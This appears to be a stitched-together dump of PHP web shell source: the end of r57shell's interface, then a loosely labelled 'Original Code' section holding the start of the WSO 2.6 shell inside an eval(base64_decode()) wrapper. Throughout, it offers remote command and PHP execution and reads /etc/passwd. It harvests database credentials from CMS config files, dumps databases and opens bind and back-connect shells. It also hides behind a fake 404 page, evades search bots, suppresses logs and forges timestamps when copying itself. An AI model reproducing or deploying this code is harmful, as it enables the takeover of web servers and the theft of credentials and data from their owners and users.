$te.'</div>'.$table_end1.$fe;}else {echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;echo sr(15 ,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85 ,$dir).in('hidden','cmd',0 ,'safe_dir').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt6']));echo $te.'</div>'.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;echo sr(15 ,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85 ,$dir).in('hidden','cmd',0 ,'edit_file').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt11']));echo $te.'</div>'.$table_end1.$fe;if($safe_mode){echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;echo sr(15 ,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54 ,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4 )."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3 )."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0 ,'mk').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt13']));echo $te.'</div>'.$table_end1.$fe;}if($safe_mode && $unix){echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;echo sr(15 ,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2 )."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2 ).in('text','param1',40 ,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2 )."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2 ).in('text','param2 title="'.$lang[$language.'_text71'].'"',26 ,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0 ,'ch_').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt1']));echo $te.'</div>'.$table_end1.$fe;}if(!$safe_mode){foreach($aliases as $alias_name=>$alias_cmd){$aliases2.="<option>$alias_name</option>";}echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;echo sr(15 ,"<b>".ws(9 ).$lang[$language.'_text8'].$arrow.ws(4 )."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt1']));echo $te.'</div>'.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;echo sr(15 ,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85 ,'text').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt12']));echo sr(15 ,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85 ,$dir)." * ( /root;/home;/tmp )");echo sr(15 ,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0 ,'1').in('text','s_mask',82 ,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0 ,'search_text').in('hidden','dir',0 ,$dir));echo $te.'</div>'.$table_end1.$fe;if(!$safe_mode && $unix){echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;echo sr(15 ,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85 ,'text').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt12']));echo sr(15 ,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85 ,$dir)." * ( /root;/home;/tmp )");echo sr(15 ,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85 ,'*.[hc]').ws(1 ).$lang[$language.'_text75'].in('hidden','cmd',0 ,'find_text').in('hidden','dir',0 ,$dir));echo $te.'</div>'.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));echo "</textarea>";echo in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'php_eval');echo "<br>".ws(1 ).in('submit','submit',0 ,$lang[$language.'_butt1']);echo "</div></div></font>";echo $table_end1.$fe;if($safe_mode && $curl_on){echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;echo sr(15 ,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85 ,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test1').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.'</div>'.$table_end1.$fe;}if($safe_mode){echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;echo "<table class=table1 width=100% align=center>";echo sr(15 ,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85 ,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test2').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.'</div>'.$table_end1.$fe;}if($safe_mode && $mysql_on){echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;echo sr(15 ,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15 ,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4 )."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15 ,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4 )."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15 ,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4 )."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15 ,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));echo sr(15 ,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96 ,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test3').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.'</div>'.$table_end1.$fe;}if($safe_mode && $mssql_on){echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;echo sr(15 ,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15 ,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4 )."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15 ,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4 )."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15 ,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4 )."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15 ,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));echo sr(15 ,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96 ,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'test4').ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt8']));echo $te.'</div>'.$table_end1.$fe;}if(@ini_get('file_uploads')){echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;echo sr(15 ,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85 ,''));echo sr(15 ,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0 ,'1').in('text','new_name',82 ,'').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt2']));echo $te.'</div>'.$table_end1.$fe;}if(!$safe_mode && !$windows){echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;echo sr(15 ,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0 ,$dir).ws(2 )."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78 ,'http://'));echo sr(15 ,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt2']));echo $te.'</div>'.$table_end1.$fe;}echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;echo sr(15 ,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85 ,$dir).in('hidden','cmd',0 ,'download_file').in('hidden','dir',0 ,$dir).ws(4 ).in('submit','submit',0 ,$lang[$language.'_butt14']));$arh=$lang[$language.'_text92'];if(@function_exists('gzcompress')){$arh.=in('radio','compress',0 ,'zip').' zip';}if(@function_exists('gzencode')){$arh.=in('radio','compress',0 ,'gzip').' gzip';}if(@function_exists('bzcompress')){$arh.=in('radio','compress',0 ,'bzip').' bzip';}echo sr(15 ,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0 ,'none').' '.$arh);echo $te.'</div>'.$table_end1.$fe;print $fs.$table_up1."CMS info".$table_up2.'<div style="text-align:center; margin:5px;">';print in('hidden','cmd',0 ,'safe_dir').in('hidden','dir',0 ,$dir).in('hidden','cms_info',0 ,'1').in('submit','submit',0 ,"get site info from database (WordPress, Joomla, DLE, Drupal, Bitrix)");if(isset($_POST['cms_info'])){print '</div><div style="text-align:center; margin:5px;"><textarea cols=100 rows=10>';if(is_file($dir."/wp-config.php")){$cmsFileSett=file_get_contents($dir."/wp-config.php");print "WordPress\r\n\r\n";preg_match('%\$table_prefix[^\']+\'(.+?)\'%i',$cmsFileSett,$cmsSettMatche);preg_match_all('%define\(\'(.+)\', \'(.*)\'\);%i',$cmsFileSett,$cmsSettMatches,PREG_SET_ORDER);$cmsResult=array();if(isset($cmsSettMatche[1 ]) && $cmsSettMatches>=4 ){foreach($cmsSettMatches as $cmsSettMatchesKey=>$cmsSettMatchesVal){$cmsResult[$cmsSettMatchesVal[1 ]]=$cmsSettMatchesVal[2 ];}if(isset($cmsResult['DB_NAME']) && isset($cmsResult['DB_USER']) && isset($cmsResult['DB_PASSWORD']) && isset($cmsResult['DB_HOST'])){$db=new dbmysql($cmsResult['DB_HOST'],$cmsResult['DB_USER'],$cmsResult['DB_PASSWORD'],$cmsResult['DB_NAME']);$query=$db->queryArr("SELECT `option_name`,`option_value` FROM `".$cmsSettMatche[1 ]."options`");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['option_name']]=$queryVal['option_value'];}print_r($cmsQuery);}}}if(is_file($dir."/configuration.php")){$cmsFileSett=file_get_contents($dir."/configuration.php");print "Joomla\r\n\r\n";print iconv("utf-8","windows-1251",$cmsFileSett);}if(is_file($dir."/engine/data/config.php")){$cmsFileSett=file_get_contents($dir."/engine/data/config.php");print "DLE\r\n\r\n";print str_replace(array("\r\n\r\n","\n\n"),array("\r\n","\n"),$cmsFileSett);}if(is_file($dir."/sites/default/settings.php")){$cmsFileSett=file_get_contents($dir."/sites/default/settings.php");print "Drupal\r\n\r\n";$cmsResult=array();preg_match('%\'database\'[^\*\']+\'([^\']*)\'[^\*]+\'username\'[^\*\']+\'([^\']*)\'[^\*]+\'password\'[^\*\']+\'([^\']*)\'[^\*]+\'host\'[^\*\']+\'([^\']*)\'[^\*]+\'prefix\'[^\*\']+\'([^\']*)\'%is',$cmsFileSett,$cmsSettMatches);if(count($cmsSettMatches)==6 ){$cmsResult['host']=$cmsSettMatches[4 ];$cmsResult['user']=$cmsSettMatches[2 ];$cmsResult['pwd']=$cmsSettMatches[3 ];$cmsResult['db']=$cmsSettMatches[1 ];$cmsResult['prefix']=$cmsSettMatches[5 ];}else {preg_match('%\$db_url = \'[a-z]+://(.+?)@(.+?)/(.+?)\';[^*]+\$db_prefix = \'([^\']*)\';%i',$cmsFileSett,$cmsSettMatches);if(count($cmsSettMatches)==5 ){$userPwd=explode(":",$cmsSettMatches[1 ]);if(!isset($userPwd[1 ])){$userPwd[1 ]='';}$cmsResult['host']=$cmsSettMatches[2 ];$cmsResult['user']=$userPwd[0 ];$cmsResult['pwd']=$userPwd[1 ];$cmsResult['db']=$cmsSettMatches[3 ];$cmsResult['prefix']=$cmsSettMatches[4 ];}}if(count($cmsResult)==5 ){$db=new dbmysql($cmsResult['host'],$cmsResult['user'],$cmsResult['pwd'],$cmsResult['db']);$query=$db->queryArr("SELECT `name`,`value` FROM `".$cmsResult['prefix']."variable`");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['name']]=$queryVal['value'];}print_r($cmsQuery);$query=$db->queryArr("SELECT * FROM `".$cmsResult['prefix']."watchdog` LIMIT 1");print_r($query);}}if(is_file($dir."/bitrix/php_interface/dbconn.php")){$cmsFileSett=file_get_contents($dir."/bitrix/php_interface/dbconn.php");print "Bitrix\r\n\r\n";preg_match('%\$DBHost[^"]+"([^"]*).+?\n\$DBLogin[^"]+"([^"]*).+\n\$DBPassword[^"]+"([^"]*).+\n\$DBName[^"]+"([^"]*)"%is',$cmsFileSett,$cmsSettMatches);$cmsResult=array();if(count($cmsSettMatches)==5 ){$cmsResult['host']=$cmsSettMatches[1 ];$cmsResult['user']=$cmsSettMatches[2 ];$cmsResult['pwd']=$cmsSettMatches[3 ];$cmsResult['db']=$cmsSettMatches[4 ];$db=new dbmysql($cmsResult['host'],$cmsResult['user'],$cmsResult['pwd'],$cmsResult['db']);$query=$db->queryArr("SELECT `NAME`,`VALUE` FROM `b_option` WHERE `MODULE_ID` = 'main'");$cmsQuery=array();foreach($query as $queryKey=>$queryVal){$cmsQuery[$queryVal['NAME']]=$queryVal['VALUE'];}print_r($cmsQuery);}}print '</textarea>';}print "</div>".$table_end1.$fe;if($mysql_on || $mssql_on || $pg_on || $ora_on){$select='<select name=db>';if($mysql_on)$select.='<option>MySQL</option>';if($mssql_on)$select.='<option>MSSQL</option>';if($pg_on)$select.='<option>PostgreSQL</option>';if($ora_on)$select.='<option>Oracle</option>';$select.='</select>';echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>";echo sr(45 ,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);echo sr(45 ,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15 ,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));echo sr(45 ,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15 ,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));echo sr(45 ,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15 ,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));echo sr(45 ,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'db_show').in('checkbox','st id=st',0 ,'1'));echo sr(45 ,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0 ,'1'));echo sr(45 ,"",in('submit','submit',0 ,$lang[$language.'_butt7']));echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";echo sr(45 ,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);echo sr(45 ,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15 ,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));echo sr(45 ,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15 ,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));echo sr(45 ,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15 ,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));echo sr(45 ,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15 ,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));echo sr(45 ,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15 ,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));echo sr(45 ,in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0 ,'1'));echo sr(45 ,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15 ,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));echo sr(45 ,"",in('submit','submit',0 ,$lang[$language.'_butt9']));echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";echo sr(45 ,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);echo sr(45 ,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15 ,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));echo sr(45 ,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15 ,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));echo sr(45 ,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15 ,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));echo sr(45 ,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15 ,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));echo sr(45 ,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0 ,$dir).in('hidden','cmd',0 ,'db_query'),"");echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0 ,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";}if(!$safe_mode && !$windows){echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";echo sr(40 ,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15 ,'11457'));echo sr(40 ,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15 ,'r57'));echo sr(40 ,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0 ,$dir));echo sr(40 ,"",in('submit','submit',0 ,$lang[$language.'_butt3']));echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";echo sr(40 ,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15 ,((getenv('REMOTE_ADDR'))?(getenv('REMOTE_ADDR')):("127.0.0.1"))));echo sr(40 ,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15 ,'11457'));echo sr(40 ,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0 ,$dir));echo sr(40 ,"",in('submit','submit',0 ,$lang[$language.'_butt4']));echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";echo sr(40 ,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15 ,'11457'));echo sr(40 ,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15 ,'irc.dalnet.ru'));echo sr(40 ,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15 ,'6667'));echo sr(40 ,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0 ,$dir));echo sr(40 ,"",in('submit','submit',0 ,$lang[$language.'_butt5']));echo $te."</td>".$fe."</tr></div></table>";}echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>[ r57shell by RST/GHC/Staf4 | version ".$version." ]</b></font></div></td></tr></table>";exit();

Did this file decode correctly?

Original Code

<?php if(isset($_GET["wso"])){ 
eval(base64_decode("$auth_pass="";$color="#00cf00";$default_action='FilesMan';$default_use_ajax=true;$default_charset='Windows-1251';if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents=array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}@session_start();@ini_set('error_log',NULL);@ini_set('log_errors',0 );@ini_set('max_execution_time',0 );@set_time_limit(0 );@set_magic_quotes_runtime(0 );@define('WSO_VERSION','2.6 / 1.4.9');if(get_magic_quotes_gpc()){function WSOstripslashes($array){return is_array($array)?array_map('WSOstripslashes',$array):stripslashes($array);}$_POST=WSOstripslashes($_POST);}function printLogin(){ ?> 
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache Server at <?=$_SERVER['HTTP_HOST'] ?> Port 80</address> 
    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    </style> 
    <center> 
    <form method=post> 
    <input type=password name=pass> 
    </form></center> 
    <? exit;}class dbmysql{var $connid=0 ;var $result='';var $errormsg='';var $lang=array("err1"=>"Unable to select database!","err2"=>"No connection to the database!","err3"=>"Unable to execute query: ");var $errorShow=1 ;var $errorExit=1 ;var $char="";function dbmysql($server,$user,$password,$database,$char=null){$this->char=($char!=null)?$char:"cp1251";$this->server=$server;$this->user=$user;$this->password=$password;$this->database=$database;if($this->connid==0 ){$this->connid=@mysql_connect($this->server,$this->user,$this->password);mysql_query("SET NAMES '".$this->char."'");mysql_query("SET CHARACTER SET '".$this->char."'");if($this->connid){if($this->database!=""){if(@mysql_select_db($this->database,$this->connid)){return $this->connid;}else {$this->errormsg=$this->lang['err1'];$this->error();}}}else {$this->errormsg=$this->lang['err2'];$this->error();}}}function query($query=''){$this->result='';if($query){$this->result=@mysql_query($query,$this->connid);}if($this->result){return $this->result;}else {$this->errormsg=$this->lang['err3'].$query;$this->error();false;}}function fetchrow($query=0 ){return @mysql_fetch_array($query);}function count($query=0 ){return @mysql_num_rows($query);}function escape($inp){return @mysql_escape_string($inp);}function error(){if($this->errorShow==1 ){print $this->errormsg;}if($this->errorExit==1 ){exit();}}function fetchrowArr($query){$result=array();while($item=$this->fetchrow($query)){$result[]=$item;}return $result;}function queryArr($query){return $this->fetchrowArr($this->query($query));}}function ShowDefaultForm($addCode,$a="FilesMan",$p1=''){if($p1==''){$p1=(isset($_POST['p1'])?$_POST['p1']:'');}print "<form name=form method=POST>
	<input type=hidden name=a value=\"".$a."\">
	<input type=hidden name=c value=\"".(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."\">
	<input type=hidden name=p1 value=\"".$p1."\">
	<input type=hidden name=p2 value=\"".(isset($_POST['p2'])?$_POST['p2']:'')."\">
	<input type=hidden name=p3 value=\"".(isset($_POST['p3'])?$_POST['p3']:'')."\">
	<input type=hidden name=charset value=\"".(isset($_POST['charset'])?$_POST['charset']:'')."\">
	".$addCode."
	</form>";}if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))if(empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass'])==$auth_pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])]=true;else printLogin();if(strtolower(substr(PHP_OS,0 ,3 ))=="win")$os='win';else $os='nix';$safe_mode=@ini_get('safe_mode');if(!$safe_mode)error_reporting(0 );$disable_functions=@ini_get('disable_functions');$home_cwd=@getcwd();if(isset($_POST['c']))@chdir($_POST['c']);$cwd=@getcwd();if($os=='win'){$home_cwd=str_replace("\\","/",$home_cwd);$cwd=str_replace("\\","/",$cwd);}if($cwd[strlen($cwd)-1 ]!='/')$cwd.='/';if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']))$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=(bool)$GLOBALS['default_use_ajax'];if($os=='win')$aliases=array("List Directory"=>"dir","Find index.php in current dir"=>"dir /s /w /b index.php","Find *config*.php in current dir"=>"dir /s /w /b *config*.php","Show active connections"=>"netstat -an","Show running services"=>"net start","User accounts"=>"net user","Show computers"=>"net view","ARP Table"=>"arp -a","IP Configuration"=>"ipconfig /all");else $aliases=array("List dir"=>"ls -lha","list file attributes on a Linux second extended file system"=>"lsattr -va","show opened ports"=>"netstat -an | grep -i listen","process status"=>"ps aux","Find"=>"","find all suid files"=>"find / -type f -perm -04000 -ls","find suid files in current dir"=>"find . -type f -perm -04000 -ls","find all sgid files"=>"find / -type f -perm -02000 -ls","find sgid files in current dir"=>"find . -type f -perm -02000 -ls","find config.inc.php files"=>"find / -type f -name config.inc.php","find config* files"=>"find / -type f -name \"config*\"","find config* files in current dir"=>"find . -type f -name \"config*\"","find all writable folders and files"=>"find / -perm -2 -ls","find all writable folders and files in current dir"=>"find . -perm -2 -ls","find all service.pwd files"=>"find / -type f -name service.pwd","find service.pwd files in current dir"=>"find . -type f -name service.pwd","find all .htpasswd files"=>"find / -type f -name .htpasswd","find .htpasswd files in current dir"=>"find . -type f -name .htpasswd","find all .bash_history files"=>"find / -type f -name .bash_history","find .bash_history files in current dir"=>"find . -type f -name .bash_history","find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc","find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc","Locate"=>"","locate httpd.conf files"=>"locate httpd.conf","locate vhosts.conf files"=>"locate vhosts.conf","locate proftpd.conf files"=>"locate proftpd.conf","locate psybnc.conf files"=>"locate psybnc.conf","locate my.conf files"=>"locate my.conf","locate admin.php files"=>"locate admin.php","locate cfg.php files"=>"locate cfg.php","locate conf.php files"=>"locate conf.php","locate config.dat files"=>"locate config.dat","locate config.php files"=>"locate config.php","locate config.inc files"=>"locate config.inc","locate config.inc.php"=>"locate config.inc.php","locate config.default.php files"=>"locate config.default.php","locate config* files "=>"locate config","locate .conf files"=>"locate '.conf'","locate .pwd files"=>"locate '.pwd'","locate .sql files"=>"locate '.sql'","locate .htpasswd files"=>"locate '.htpasswd'","locate .bash_history files"=>"locate '.bash_history'","locate .mysql_history files"=>"locate '.mysql_history'","locate .fetchmailrc files"=>"locate '.fetchmailrc'","locate backup files"=>"locate backup","locate dump files"=>"locate dump","locate priv files"=>"locate priv");function wsoHeader(){$upload_shell_result="";if(isset($_POST['upload_shell']) && isset($_POST['fileName'])){$shellIplDir=(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);$upload_shell_result=(@copy($_SERVER['SCRIPT_FILENAME'],$shellIplDir."/".$_POST['fileName']))?"shell uploaded!":"shell NOT uploaded!";if(is_file('index.php')){$timeOthFile=filemtime('index.php');touch($shellIplDir."/".$_POST['fileName'],$timeOthFile,$timeOthFile);}}if(empty($_POST['charset']))$_POST['charset']=$GLOBALS['default_charset'];global $color;echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=".$_POST['charset']."'><title>".$_SERVER['HTTP_HOST']." - WSO ".WSO_VERSION."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
span.small {font-weight:normal; font-size:8px; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
/*.main th{text-align:left;background-color:#5e5e5e;}*/
.main th{text-align:left;background-color:#111111; font-weight:bold;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '".htmlspecialchars($GLOBALS['cwd'])."';
    var a_ = '".htmlspecialchars(@$_POST['a'])."'
    var charset_ = '".htmlspecialchars(@$_POST['charset'])."';
